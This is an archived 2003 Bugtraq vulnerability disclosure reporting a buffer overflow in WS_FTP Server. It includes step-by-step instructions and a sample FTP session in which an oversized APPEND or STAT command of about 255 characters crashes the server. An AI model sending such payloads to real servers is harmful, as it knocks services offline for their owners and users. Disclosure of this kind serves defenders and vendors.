lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030906044827.13842.qmail@sf-www2-symnsj.securityfocus.com>
Date: 6 Sep 2003 04:48:27 -0000
From: pejman d <pejman@...e.ca>
To: bugtraq@...urityfocus.com
Subject: Remote and Local Vulnerabilities In WS_FTP Server




hi dear
i am pejman.d ,i finded the new bug in ws_ftp server 
 
Vulnerable Systems : ws_ftp server  4,3
the bug is buffer overflow in ftp command service stop and some error

step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command  to server 
3- you can use  status or append or some command 
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
 

quote
Command line to send 
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
 
SAMPLE :
 
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Connection closed by remote host.
ftp>
 
 
ftp server is stop and all connection is refused !!!
it's work at ver 3,4  and test on the windows 2000 advance and prof  with  
sp4 
 
i u need the additional information send mail to pejman@...e.ca
 
pejman.d (deject hacker )


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ